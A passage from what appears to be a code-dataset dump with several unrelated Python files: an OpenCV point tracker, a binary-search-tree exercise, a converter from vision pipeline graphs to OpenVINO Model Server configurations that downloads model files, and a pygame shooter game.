Select good points\n bound = st1 == 1\n good = d < 1\n\n \n #prev_average = np.sum(good_prev_corners,axis=0)\n #new_average = np.sum(good_new_corners,axis=0)\n #diff_avg = new_average-prev_average\n\n # compute average of good points\n idx = np.where(good)\n good_prev_points = self.p0list[idx]\n good_new_points = p1[idx]\n prev_average = np.sum(good_prev_points,axis=0)\n new_average = np.sum(good_new_points,axis=0)\n diff_avg = new_average-prev_average\n \n data = []\n for i,(new,good,flag) in enumerate(zip(p1,good,self.p0flags)):\n x,y = new.ravel()\n x = int(x)\n y = int(y)\n if(good and flag):\n # update p0list\n self.p0list[i] = p1[i]\n\n # display good points\n self.mask = cv2.circle(frame,(x,y),5,(255,0,0))\n dx = (int)(self.lk_params[\"winSize\"][0]/2)\n dy = (int)(self.lk_params[\"winSize\"][1]/2)\n rect = cv2.rectangle(frame,(int(x)-dx,int(y)-dy),(int(x)+dx,int(y)+dy),(255,0,0))\n data.append((x,y))\n if(x >= 0 and x< self.width and y >= 0 and y < self.height ):\n self.p0lastgoodI[i] = gray[y,x]\n else: \n # update with the unabscured points\n self.p0list[i] = self.p0list[i] + diff_avg\n self.p0flags[i] = 0\n \n if(x >= 0 and x< self.width and y >= 0 and y < self.height):\n I = gray[y,x] \n if(self.p0lastgoodI[i]==I):\n self.p0flags[i]=1\n\n if(np.sum(self.p0flags)/len(self.p0flags) target:\n root = root.left\n else:\n root = root.right\n \n tmp2 = self.closestValue(root, target)\n \n if not root:\n return tmp1\n \n if abs(tmp1-target) < abs(tmp2-target):\n return tmp1\n else:\n return tmp2","sub_path":"Codes/270 Closest Binary Search Tree Value Easy.py","file_name":"270 Closest Binary Search Tree Value Easy.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"151505271","text":"import json\nimport os\nimport subprocess\n\nimport networkx\n\nfrom . import ovms\nfrom . 
import voe\n\n#from IPython import embed\n\n# FIXME\nROOT = '/workspace'\n\n# uncomment these for running locally\n#ROOT = '/tmp/workspace'\n#subprocess.run(['mkdir', '-p', '/tmp/workspace'])\n#subprocess.run(['mkdir', '-p', '/tmp/workspace/tmp'])\n\n\nMODEL_DIR = ROOT\nLIB_DIR = ROOT + '/lib'\nTMP_DIR = ROOT + '/tmp'\n\n\ndef load_voe_config_from_dict(j):\n voe_config = voe.VoeConfig(**j)\n return voe_config\n\ndef load_voe_config_from_json(j):\n voe_config = voe.VoeConfig(**json.loads(j))\n return voe_config\n\ndef _get_node_from_graph(node_id, g):\n return g.nodes.get(node_id)['data']\n\ndef _get_edge_from_graph(parent_id, node_id, g):\n return g.edges.get((parent_id, node_id))['data']\n\ndef process_source(node, voe_config):\n return node.outputs[0].name\n\ndef process_openvino_model(node, g):\n\n model_config = ovms.ModelConfig(\n name=node.name,\n base_path=MODEL_DIR+'/'+node.openvino_model_name\n \n )\n\n #\n # Download Model\n #\n model_name = node.openvino_model_name\n need_download = True\n if os.path.isdir(MODEL_DIR+'/'+model_name):\n if os.path.isfile(MODEL_DIR+'/'+model_name+'/1/'+model_name+'.xml') and os.path.isfile(MODEL_DIR+'/'+model_name+'/1/'+model_name+'.bin'):\n need_download = False\n else:\n subprocess.run(['rm', '-rf', MODEL_DIR+'/'+model_name])\n\n if need_download:\n subprocess.run(['python', 'downloader/tools/downloader/downloader.py', '-o', TMP_DIR, '--name', model_name, '--precision', 'FP32'])\n subprocess.run(['mkdir', '-p', MODEL_DIR+'/'+model_name])\n subprocess.run(['mkdir', '-p', MODEL_DIR+'/'+model_name+'/1'])\n subprocess.run(['mv', TMP_DIR+'/intel/'+model_name+'/FP32/'+model_name+'.xml', MODEL_DIR+'/'+model_name+'/1/'+model_name+'.xml'])\n subprocess.run(['mv', TMP_DIR+'/intel/'+model_name+'/FP32/'+model_name+'.bin', MODEL_DIR+'/'+model_name+'/1/'+model_name+'.bin'])\n\n \n if node.inputs[0].metadata['type'] != 'image': raise Exception('Not a model')\n\n model_config.shape = '('+', '.join(str(n) for n in node.inputs[0].metadata['shape'])+')'\n model_config.layout = ''.join(node.inputs[0].metadata['layout'])\n\n\n metadatas = {node.name: {}}\n\n outputs = []\n for output in node.outputs:\n outputs.append(ovms.PipelineConfigNodeOutput(\n data_item=output.name,\n alias=output.name\n ))\n\n\n # FIXME intel openvino detection model labels begin with 1 ...\n # Need to find a better way to embed this policy\n ##########################################################\n if output.metadata['type'] == 'bounding_box':\n output.metadata['labels'] = ['']+output.metadata['labels']\n ##########################################################\n\n\n\n metadatas[node.name][output.name] = output.metadata\n\n inputs = []\n for input in node.inputs:\n found_parent = False\n for parent_id in g.predecessors(node.node_id):\n parent_node = _get_node_from_graph(parent_id, g)\n edge = _get_edge_from_graph(parent_id, node.node_id, g)\n if input.name == edge.target.input_name:\n found_parent = True\n\n inputs.append(\n {input.name: ovms.PipelineConfigNodeInput(\n node_name=parent_node.name,\n data_item=edge.source.output_name)\n }\n )\n\n break\n\n if not found_parent: raise Exception('Unfulfilled inputs')\n\n pipeline_config_node = ovms.PipelineConfigModelNode(\n name=node.name,\n #model_name=node.openvino_model_name,\n model_name=node.name,\n type='DL model',\n inputs=inputs,\n outputs=outputs)\n\n return model_config, pipeline_config_node, metadatas\n\ndef process_customvision_model(node, g):\n\n model_name = node.download_uri_openvino.split('/')[3][2:]\n iteration_id = 
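# For reference, a sketch of the on-disk layout the download steps above
# produce, which is the versioned model repository OpenVINO Model Server
# expects (paths follow the MODEL_DIR constant in this module):
#
#   /workspace/<model_name>/
#       1/
#           <model_name>.xml
#           <model_name>.bin
#
# ModelConfig.base_path points at /workspace/<model_name>, and '1' is the
# model version directory.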
node.download_uri_openvino.split('/')[4].split('.')[0]\n\n #\n # Download Model\n #\n file_name = ROOT + '/' + iteration_id + '.zip'\n if os.path.isfile(file_name):\n # customvision model already downloaded\n subprocess.run(['cp', file_name, TMP_DIR+'/model.zip'])\n else:\n # customvision not yet downloaded\n subprocess.run(['wget', '-O', TMP_DIR+'/model.zip', node.download_uri_openvino])\n \n subprocess.run(['unzip', '-o', TMP_DIR+'/model.zip', '-d', TMP_DIR])\n subprocess.run(['mkdir', '-p', MODEL_DIR+'/'+model_name])\n subprocess.run(['mkdir', '-p', MODEL_DIR+'/'+model_name+'/1'])\n subprocess.run(['mv', TMP_DIR+'/model.xml', MODEL_DIR+'/'+model_name+'/1/'+model_name+'.xml'])\n subprocess.run(['mv', TMP_DIR+'/model.bin', MODEL_DIR+'/'+model_name+'/1/'+model_name+'.bin'])\n\n if node.inputs[0].metadata['type'] != 'image': raise Exception('Not a model')\n\n\n model_configs = [] \n cv_pre_model_config = ovms.ModelConfig(\n name='cv_pre',\n base_path=MODEL_DIR+'/cv_pre',\n shape='('+', '.join(str(n) for n in node.inputs[0].metadata['shape'])+')',\n layout=''.join(node.inputs[0].metadata['layout'])\n )\n\n cv_model_config = ovms.ModelConfig(\n name=node.name,\n base_path=MODEL_DIR+'/'+model_name,\n shape='('+', '.join(str(n) for n in node.inputs[0].metadata['shape'])+')',\n #layout=''.join(node.inputs[0].metadata['layout'])\n layout='NCHW'\n )\n\n cv_post_model_config = ovms.ModelConfig(\n name='cv_post',\n base_path=MODEL_DIR+'/cv_post',\n )\n\n model_configs = [cv_pre_model_config, cv_model_config, cv_post_model_config]\n\n \n cv_post_outputs = []\n metadatas = {node.name: {}}\n for output in node.outputs:\n cv_post_outputs.append(ovms.PipelineConfigNodeOutput(\n data_item='PartitionedCall/model/detection_out/concat',\n alias=output.name\n ))\n\n metadatas[node.name][output.name] = output.metadata\n\n cv_pre_inputs = []\n for input in node.inputs:\n found_parent = False\n for parent_id in g.predecessors(node.node_id):\n parent_node = _get_node_from_graph(parent_id, g)\n edge = _get_edge_from_graph(parent_id, node.node_id, g)\n if input.name == edge.target.input_name:\n found_parent = True\n\n cv_pre_inputs.append(\n {'image': ovms.PipelineConfigNodeInput(\n node_name=parent_node.name,\n data_item=edge.source.output_name)\n }\n )\n\n break\n\n if not found_parent: raise Exception('Unfulfilled inputs')\n\n cv_pre_pipeline_config_node = ovms.PipelineConfigModelNode(\n name='cv_pre',\n model_name='cv_pre',\n type='DL model',\n inputs=cv_pre_inputs,\n outputs=[\n ovms.PipelineConfigNodeOutput(\n data_item='PartitionedCall/model/image_out/mul',\n alias='image')\n ]\n )\n\n cv_pipeline_config_node = ovms.PipelineConfigModelNode(\n name=node.name,\n model_name=node.name,\n type='DL model',\n inputs=[\n {'data': ovms.PipelineConfigNodeInput(\n node_name='cv_pre',\n data_item='image')},\n ],\n outputs=[\n ovms.PipelineConfigNodeOutput(\n data_item='detected_classes',\n alias='detected_classes'),\n ovms.PipelineConfigNodeOutput(\n data_item='detected_scores',\n alias='detected_scores'),\n ovms.PipelineConfigNodeOutput(\n data_item='detected_boxes',\n alias='detected_boxes'),\n ]\n )\n\n cv_post_pipeline_config_node = ovms.PipelineConfigModelNode(\n name='cv_post',\n model_name='cv_post',\n type='DL model',\n inputs=[\n {'detected_classes': ovms.PipelineConfigNodeInput(\n node_name=node.name,\n data_item='detected_classes')},\n {'detected_scores': ovms.PipelineConfigNodeInput(\n node_name=node.name,\n data_item='detected_scores')},\n {'detected_boxes': ovms.PipelineConfigNodeInput(\n 
node_name=node.name,\n data_item='detected_boxes')},\n ],\n outputs=cv_post_outputs,\n )\n\n pipeline_config_nodes = [cv_pre_pipeline_config_node, cv_pipeline_config_node, cv_post_pipeline_config_node]\n \n\n return model_configs, pipeline_config_nodes, metadatas\n\n\ndef process_openvino_library(node, g): \n\n library_config = ovms.CustomNodeLibraryConfig(\n name=node.name,\n base_path=LIB_DIR+'/'+node.openvino_library_name\n )\n \n outputs = []\n for output in node.outputs:\n outputs.append(ovms.PipelineConfigNodeOutput(\n data_item=output.name,\n alias=output.name\n ))\n\n inputs = []\n for input in node.inputs:\n found_parent = False\n for parent_id in g.predecessors(node.node_id):\n parent_node = _get_node_from_graph(parent_id, g)\n edge = _get_edge_from_graph(parent_id, node.node_id, g)\n if input.name == edge.target.input_name:\n found_parent = True\n\n # FIXME\n parent_node_name = parent_node.name\n if parent_node.type == 'customvision_model':\n parent_node_name = 'cv_post'\n\n # FIXME better move this policy to front-end\n if parent_node.type == 'openvino_model':\n if node.params['filter_label_id'] != '-1':\n node.params['filter_label_id'] = str(int(node.params['filter_label_id'])+1)\n\n inputs.append(\n {input.name: ovms.PipelineConfigNodeInput(\n node_name=parent_node_name,\n data_item=edge.source.output_name)\n }\n )\n\n break\n\n if not found_parent: raise Exception('Unfulfilled inputs')\n\n\n pipeline_config_node = ovms.PipelineConfigCustomNode(\n name=node.name,\n #library_name=node.openvino_library_name,\n library_name=node.name,\n type='custom',\n inputs=inputs,\n outputs=outputs,\n demultiply_count=0,\n params=node.params,\n )\n\n return library_config, pipeline_config_node\n\ndef process_sink(node, g):\n parent_id = next(g.predecessors(node.node_id))\n parent_node = _get_node_from_graph(parent_id, g)\n edge = _get_edge_from_graph(parent_id, node.node_id, g)\n \n ret = {\n node.name: ovms.PipelineConfigOutput(\n node_name=parent_node.name,\n data_item=edge.source.output_name,\n )\n }\n return ret\n\n\ndef voe_config_to_ovms_config(voe_config,\n name,\n model_dir=MODEL_DIR,\n lib_dir=LIB_DIR):\n\n g = networkx.DiGraph()\n\n\n for node in voe_config.nodes:\n g.add_node(node.node_id, data=node)\n\n for edge in voe_config.edges:\n # Add some validation here FIXME\n g.add_edge(\n edge.source.node_id,\n edge.target.node_id,\n data=edge\n )\n\n ori_metadatas = {}\n\n model_config_list = []\n library_config_list = []\n pipeline_config = {\n 'name': name,\n 'inputs': [],\n 'nodes': [],\n 'outputs': []\n }\n\n #from IPython import embed; embed()\n for node_id in networkx.topological_sort(g):\n node = g.nodes[node_id]['data']\n if node.type == 'source':\n input = process_source(node, g)\n pipeline_config['inputs'].append(input)\n\n elif node.type == 'openvino_model':\n model_config, pipeline_config_node, _metadatas = process_openvino_model(node, g)\n model_config_list.append({'config': model_config})\n pipeline_config['nodes'].append(pipeline_config_node)\n ori_metadatas.update(_metadatas)\n\n elif node.type == 'openvino_library':\n library_config, pipeline_config_node = process_openvino_library(node, g)\n library_config_list.append(library_config)\n pipeline_config['nodes'].append(pipeline_config_node)\n\n # hack FIXME\n if node.name == 'Crop & Filter':\n pipeline_config['outputs'].append({\n 'confidences': ovms.PipelineConfigOutput(\n node_name=node.name,\n data_item='confidences'\n )})\n pipeline_config['outputs'].append({\n 'coordinates': ovms.PipelineConfigOutput(\n 
node_name=node.name,\n data_item='coordinates'\n )})\n pipeline_config['outputs'].append({\n 'label_ids': ovms.PipelineConfigOutput(\n node_name=node.name,\n data_item='label_ids'\n )})\n\n elif node.type == 'customvision_model':\n model_configs, pipeline_config_nodes, _metadatas = process_customvision_model(node, g)\n for model_config in model_configs:\n model_config_list.append({'config': model_config})\n pipeline_config['nodes'] += pipeline_config_nodes\n ori_metadatas.update(_metadatas)\n\n\n elif node.type == 'sink':\n output = process_sink(node, g)\n pipeline_config['outputs'].append(output)\n \n else:\n raise Exception('Unknown Node Type', node.type)\n #import pprint\n #pprint.pprint(model_config_list) \n #pprint.pprint(pipeline_config) \n #from IPython import embed; embed()\n ovms_config = ovms.Config(\n model_config_list=model_config_list,\n custom_node_library_config_list=library_config_list,\n pipeline_config_list=[pipeline_config]\n )\n\n #FIXME\n detection_metadata = None\n for node in ori_metadatas:\n for output_name in ori_metadatas[node]:\n if ori_metadatas[node][output_name]['type'] == 'bounding_box':\n detection_metadata = ori_metadatas[node][output_name]\n\n metadatas = {} \n if len(ovms_config.pipeline_config_list) > 0:\n for output in ovms_config.pipeline_config_list[0].outputs:\n for k, v in output.items():\n if v.node_name in ori_metadatas:\n if v.data_item in ori_metadatas[v.node_name]:\n metadatas[k] = ori_metadatas[v.node_name][v.data_item]\n\n # FIXME\n elif v.data_item == 'label_ids' and detection_metadata is not None:\n metadatas[k] = detection_metadata\n\n return ovms_config, metadatas\n\nif __name__ == '__main__':\n j = json.load(open('cascade/test/voe_config.json'))\n voe_config = load_voe_config_from_dict(j)\n c, metadatas = voe_config_to_ovms_config(voe_config, 'wew')\n #json.dump(c.dict(exclude_none=True), open('cascade/test/ovms_config2.json', 'w+'))\n #import pprint\n #pprint.pprint(c.dict())\n #from IPython import embed; embed()\n print(metadatas)\n\n\n\n\n\n\n \n","sub_path":"factory-ai-vision/EdgeSolution/modules/ModelManagerModule/app/cascade/voe_to_ovms.py","file_name":"voe_to_ovms.py","file_ext":"py","file_size_in_byte":15256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"296644558","text":"#pythonDefender Beta 0.1\r\n#Copyright (c) 2012, RevertedSoft\r\n#All rights reserved.\r\n#\r\n#Redistribution and use in source and binary forms, with or without\r\n#modification, are permitted provided that the following conditions are met: \r\n#\r\n#1. Redistributions of source code must retain the above copyright notice, this\r\n# list of conditions and the following disclaimer. \r\n#2. Redistributions in binary form must reproduce the above copyright notice,\r\n# this list of conditions and the following disclaimer in the documentation\r\n# and/or other materials provided with the distribution. \r\n#\r\n#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\r\n#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\r\n#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\n#DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\r\n#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\r\n#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\r\n#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\r\n#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\r\n#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n\r\nimport pygame, sys, random, os\r\nfrom pygame.locals import *\r\n\r\ndef drawText(text, font, surface, x, y, color):\r\n textobj = font.render(text, 1, color)\r\n textrect = textobj.get_rect()\r\n textrect.topleft = (x, y)\r\n surface.blit(textobj, textrect)\r\n\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit()\r\n\r\ndef waitForPlayerToPressKey():\r\n while True:\r\n if gameLoop == 1:\r\n drawText('Press SPACE to continue . . .', font, windowSurface, round((WINDOWWIDTH / 3)) + 20, round((WINDOWHEIGHT / 2)), GREEN)\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n terminate()\r\n\r\n if event.type == KEYDOWN:\r\n if event.key == K_SPACE:\r\n return\r\n\r\n if event.type == KEYUP:\r\n if event.key == K_ESCAPE or event.key == ord('q'):\r\n terminate()\r\n\r\n if event.key == K_i:\r\n instructions()\r\n return\r\n\r\ndef instructions():\r\n windowSurface.fill(BLACK)\r\n instructionsOn = True\r\n while instructionsOn:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n terminate()\r\n \r\n drawText('INSTRUCTIONS', font, windowSurface, round(WINDOWWIDTH/2) - 40, 5, GREEN)\r\n drawText('Use the LEFT and RIGHT arrow keys to maneuver your ship.', font, windowSurface, 1, 21, GREEN)\r\n drawText('Use the SPACEBAR to fire your cannons.', font, windowSurface, 1, 36, GREEN)\r\n drawText('Press the S key at any time to open the shop.', font, windowSurface, 1, 51, GREEN)\r\n drawText('Purchase upgrades with the mouse.', font, windowSurface, 1, 66, GREEN)\r\n drawText('Press space to continue. . 
.', font, windowSurface, 1, 81, GREEN)\r\n pygame.display.update()\r\n\r\n waitForPlayerToPressKey()\r\n\r\n\r\n return\r\n \r\n\r\n# set up pygame\r\npygame.init()\r\nmainClock = pygame.time.Clock()\r\n\r\n# set up the window\r\nWINDOWWIDTH = 400\r\nWINDOWHEIGHT = 800\r\npygame.display.set_icon(pygame.image.load('Images' + os.sep + 'playerShip.png'))\r\nwindowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), pygame.FULLSCREEN)\r\npygame.display.set_caption('pythonDefender')\r\n\r\n# set up the background and sprites\r\nbackgroundImage = pygame.image.load('Images' + os.sep + 'pythonDefenderBackground.jpg')\r\nbackgroundRect = pygame.transform.scale(backgroundImage, (WINDOWWIDTH, WINDOWHEIGHT))\r\n\r\nenemyImage = pygame.image.load('Images' + os.sep + 'enemyDrone.png')\r\nenemyImageFlipped = pygame.transform.flip(enemyImage, False, True)\r\n\r\nplayerBulletImage = pygame.image.load('Images' + os.sep + 'Bullet.png')\r\n\r\nplayerShipImage = pygame.image.load('Images' + os.sep + 'playerShip.png')\r\n\r\nenemyBulletImage = pygame.image.load('Images' + os.sep + 'enemyBullet.png')\r\n\r\n# setup speed variables\r\nplayerSpeed = 10\r\ncompSpeed = 6\r\n\r\n# setup movement variables\r\nRIGHT = 6\r\nLEFT = 4\r\n\r\n# set up the colors\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\nGREY = (128,128,128)\r\nDARKGREY = (52,52,52)\r\nRED = (255,0,0)\r\nGREEN = (0,255,0)\r\nLIGHTBLUE = (0,255,255)\r\nTURQUOISE = (0,255,126)\r\nBLUE = (0,0,255)\r\nYELLOW = (255,255,0)\r\nORANGE = (255,126,0)\r\nPURPLE = (255,0,255)\r\nDEEPPURPLE = (128,0,128)\r\n\r\n# set up the font\r\nfont = pygame.font.SysFont(None, 18)\r\nsmallFont = pygame.font.SysFont(None, 14)\r\n\r\n\r\n#-----------------------------------DEFENDER-----------------------------------#\r\n\r\n\r\n# Run the game loops\r\nwhile True:\r\n\r\n gameLoop = 0\r\n\r\n # Welcome loop\r\n\r\n # display the welcome screen\r\n windowSurface.fill(BLACK)\r\n drawText('pythonDefender', font, windowSurface, (WINDOWWIDTH / 3), (WINDOWHEIGHT / 2), GREEN)\r\n drawText('Press space to start, or ESCAPE to exit.', font, windowSurface, ((WINDOWWIDTH / 4) - 20), (WINDOWHEIGHT / 2) + 30, GREEN)\r\n drawText('Press I for instructions.', font, windowSurface, ((WINDOWWIDTH / 4) - 20), (WINDOWHEIGHT / 2) + 45, GREEN)\r\n pygame.display.update()\r\n\r\n # wait for player to press key to continue\r\n waitForPlayerToPressKey()\r\n\r\n while True:\r\n\r\n # Setup loop\r\n\r\n # setup player ship, computer ships, and bullets\r\n playerAlive = True\r\n playerShopOpen = False\r\n dashBoard = pygame.Rect(0, (WINDOWHEIGHT - 45), WINDOWWIDTH, 45)\r\n playerScore = 0\r\n playerCredits = 0\r\n playerWidth = 12\r\n playerHeight = 16\r\n shieldSpaceSide = (playerWidth)\r\n shieldSpaceTop = (playerHeight / 2)\r\n shieldRadius = (float(playerHeight) * 1.5)\r\n playerSpeed = 10 \r\n playerBulletSpeed = 15\r\n playerShip = {'rect':pygame.Rect((WINDOWWIDTH / 2) - (playerWidth / 2), (dashBoard.top - playerHeight - shieldSpaceTop - 10), playerWidth, playerHeight),\r\n 'speed':playerSpeed,\r\n 'surface':pygame.transform.scale(playerShipImage, ((playerWidth*2), (playerHeight*2)))}\r\n playerShield = pygame.Rect((playerShip['rect'].left - shieldSpaceSide), (playerShip['rect'].top - shieldSpaceTop), ((playerWidth + shieldSpaceSide * 2)), ((playerHeight + shieldSpaceTop * 2)))\r\n shieldImage = pygame.image.load('Images' + os.sep + 'shieldSprite.png')\r\n shieldRect = pygame.transform.scale(shieldImage, ((int(shieldRadius*2)), (int(shieldRadius*2))))\r\n playerShieldHealth = 2\r\n playerShieldRegenRate 
= 0\r\n playerShieldRegenThresh = 400 # number of ticks before 1 point of shield regenerates\r\n playerShieldMax = 2\r\n playerBullets = []\r\n playerBulletWidth = 2\r\n playerBulletHeight = 4\r\n # setup players superweapon\r\n playerLaserWidth = 1\r\n playerLaserCurrentReload = 0\r\n playerLaserReload = 500\r\n playerLaserCurrentDuration = 0\r\n playerLaserDuration = 0\r\n playerLaserOwned = False\r\n playerLaserOn = False\r\n playerLaserTry = False\r\n extensionValue = 0\r\n playerLaserList = []\r\n \r\n currentReload = 0\r\n reload = 20 # number of ticks before a player can fire again, upgrades available to increase speed\r\n reloadUpgradeCount = 0\r\n reloadUpgradeMax = 10\r\n cannonSizeUpgradeCount = 0\r\n cannonSizeUpgradeMax = 5\r\n maxShieldUpgradeCount = 0\r\n maxShieldUpgradeMax = 6\r\n shieldRegenUpgradeCount = 0\r\n shieldRegenUpgradeMax = 18\r\n laserUpgradeCount = 0\r\n laserUpgradeMax = 5\r\n \r\n computerShipWidth = 11\r\n computerShipHeight = 15\r\n computerSize = 20\r\n computerStartPositionX = 1\r\n computerStartPositionY = 1\r\n computerSpeed = 4\r\n computerReload = 33\r\n computerBulletSpeed = 12\r\n computerBulletWidth = 1\r\n computerBulletHeight = 3\r\n computerShips = []\r\n addComputerShip = 15\r\n addComputerIncrement = 100 # number of ticks between enemy ship spawns\r\n computerBullets = []\r\n spawnRate = 2000 # number of ticks before the spawn rate is increased, also conected to wave\r\n bulletInflator = 2 # number of spawn cycles before computer bullet size is increased\r\n wave = 1\r\n \r\n # setup player movement variables\r\n moveLeft = False\r\n moveRight = False\r\n addPlayerBullets = False\r\n\r\n while playerAlive:\r\n\r\n # Game loop\r\n\r\n # variable to prevent crash from two bullets hitting an enemy ship\r\n bulletHit = False\r\n\r\n # increase difficulty after wave 20\r\n if wave > 20:\r\n computerReload = 10\r\n computerBulletSpeed = 15\r\n computerSpeed = 7\r\n\r\n # check for the QUIT event\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n terminate()\r\n # check for keypress events\r\n if event.type == KEYDOWN:\r\n # change keyboard variables\r\n if event.key == K_LEFT or event.key == ord('a'):\r\n moveLeft = True\r\n moveRight = False\r\n if event.key == K_RIGHT or event.key == ord('d'):\r\n moveRight = True\r\n moveLeft = False\r\n if event.key == K_SPACE:\r\n addPlayerBullets = True\r\n playerLaserTry = True #REMOVE\r\n if event.key == ord('p'):\r\n waitForPlayerToPressKey()\r\n \r\n # check for shop open\r\n if event.key == ord('s'):\r\n playerShopOpen = True\r\n \r\n if event.type == KEYUP:\r\n if event.key == K_ESCAPE or event.key == ord('q'):\r\n terminate()\r\n if event.key == K_LEFT or event.key == ord('a'):\r\n moveLeft = False\r\n if event.key == K_RIGHT or event.key == ord('d'):\r\n moveRight = False\r\n if event.key == K_SPACE:\r\n addPlayerBullets = False\r\n playerLaserTry = False\r\n\r\n # handle the player shop\r\n while playerShopOpen:\r\n\r\n # set up player mouse position to handle button clicks\r\n mousePos = pygame.mouse.get_pos()\r\n\r\n # set up the button column\r\n buttonX = 175\r\n\r\n # set up the costs and increase value as purchased\r\n reloadUpgradeCost = ((reloadUpgradeCount * 1500) + 1500)\r\n cannonSizeUpgradeCost = ((cannonSizeUpgradeCount * 2000) + 2000)\r\n maxShieldUpgradeCost = ((maxShieldUpgradeCount * 2000) + 2000)\r\n shieldRegenUpgradeCost = ((shieldRegenUpgradeCount * 500) + 500)\r\n laserUpgradeCost = ((laserUpgradeCount * 25000) + 25000)\r\n\r\n # check for the QUIT event\r\n 
for event in pygame.event.get():\r\n if event.type == QUIT:\r\n terminate()\r\n\r\n # check for mouse button events, and handle appropriately if a button is clicked\r\n if event.type == MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n if reloadUpgrade.collidepoint(mousePos) and reloadUpgradeCount < reloadUpgradeMax and playerCredits >= reloadUpgradeCost:\r\n reload -= 1\r\n playerCredits -= reloadUpgradeCost\r\n reloadUpgradeCount += 1\r\n if cannonSizeUpgrade.collidepoint(mousePos) and cannonSizeUpgradeCount < cannonSizeUpgradeMax and playerCredits >= cannonSizeUpgradeCost:\r\n playerBulletWidth += 1\r\n playerBulletHeight += 1\r\n playerCredits -= cannonSizeUpgradeCost\r\n cannonSizeUpgradeCount += 1\r\n if maxShieldUpgrade.collidepoint(mousePos) and maxShieldUpgradeCount < maxShieldUpgradeMax and playerCredits >= maxShieldUpgradeCost:\r\n playerShieldMax += 1\r\n playerCredits -= maxShieldUpgradeCost\r\n maxShieldUpgradeCount += 1\r\n if shieldRegenUpgrade.collidepoint(mousePos) and shieldRegenUpgradeCount < shieldRegenUpgradeMax and playerCredits >= shieldRegenUpgradeCost:\r\n playerShieldRegenThresh -= 20\r\n playerCredits -= shieldRegenUpgradeCost\r\n shieldRegenUpgradeCount += 1\r\n if laserUpgrade.collidepoint(mousePos) and laserUpgradeCount < laserUpgradeMax and playerCredits >= laserUpgradeCost:\r\n playerLaserWidth += 1\r\n playerLaserReload -= 75\r\n playerLaserDuration += 20\r\n playerLaserCurrentDuration = playerLaserDuration\r\n playerCredits -= laserUpgradeCost\r\n laserUpgradeCount += 1\r\n playerLaserOwned = True\r\n \r\n # handle keypress events\r\n if event.type == KEYDOWN:\r\n if event.key == ord('s'):\r\n playerShopOpen = False\r\n if event.key == K_ESCAPE or event.key == ord('q'):\r\n terminate()\r\n \r\n # draw shop menu to screen \r\n windowSurface.fill(BLACK)\r\n reloadUpgrade = pygame.Rect(buttonX, 1, 10, 10)\r\n cannonSizeUpgrade = pygame.Rect(buttonX, (reloadUpgrade.bottom + 5), 10, 10)\r\n maxShieldUpgrade = pygame.Rect(buttonX, (cannonSizeUpgrade.bottom + 5), 10, 10)\r\n shieldRegenUpgrade = pygame.Rect(buttonX, (maxShieldUpgrade.bottom + 5), 10, 10)\r\n laserUpgrade = pygame.Rect(buttonX, (shieldRegenUpgrade.bottom + 5), 10, 10)\r\n\r\n # display the players credits\r\n drawText('Credits: $%s' % playerCredits, font, windowSurface, (WINDOWWIDTH / 2), 1, GREEN)\r\n\r\n # list the upgrades and draw their corresponding buttons\r\n drawText('Reload speed: $%s %s/%s' % (reloadUpgradeCost, reloadUpgradeCount, reloadUpgradeMax), font, windowSurface, 1, 1, RED)\r\n pygame.draw.rect(windowSurface, YELLOW, reloadUpgrade)\r\n drawText('Cannon size: $%s %s/%s' % (cannonSizeUpgradeCost, cannonSizeUpgradeCount, cannonSizeUpgradeMax), font, windowSurface, 1, 16, RED)\r\n pygame.draw.rect(windowSurface, YELLOW, cannonSizeUpgrade)\r\n drawText('Max shield: $%s %s/%s' % (maxShieldUpgradeCost, maxShieldUpgradeCount, maxShieldUpgradeMax), font, windowSurface, 1, 31, LIGHTBLUE)\r\n pygame.draw.rect(windowSurface, YELLOW, maxShieldUpgrade)\r\n drawText('Shield regen: $%s %s/%s' % (shieldRegenUpgradeCost, shieldRegenUpgradeCount, shieldRegenUpgradeMax), font, windowSurface, 1, 46, LIGHTBLUE)\r\n pygame.draw.rect(windowSurface, YELLOW, shieldRegenUpgrade)\r\n drawText('Laser Cannon: $%s %s/%s' % (laserUpgradeCost, laserUpgradeCount, laserUpgradeMax), font, windowSurface, 1, 61, PURPLE)\r\n pygame.draw.rect(windowSurface, YELLOW, laserUpgrade)\r\n \r\n pygame.display.update()\r\n\r\n # back to main game loop\r\n\r\n # add computer ship if ship counter is 0 or less\r\n if 
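# A worked example of the shop pricing above: every upgrade's cost grows
# linearly with purchases, cost = (count * step) + step. Reload-speed
# upgrades therefore cost $1500, $3000, ..., $15000, so buying all
# reloadUpgradeMax = 10 of them totals 1500 * (1 + 2 + ... + 10) = $82,500.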
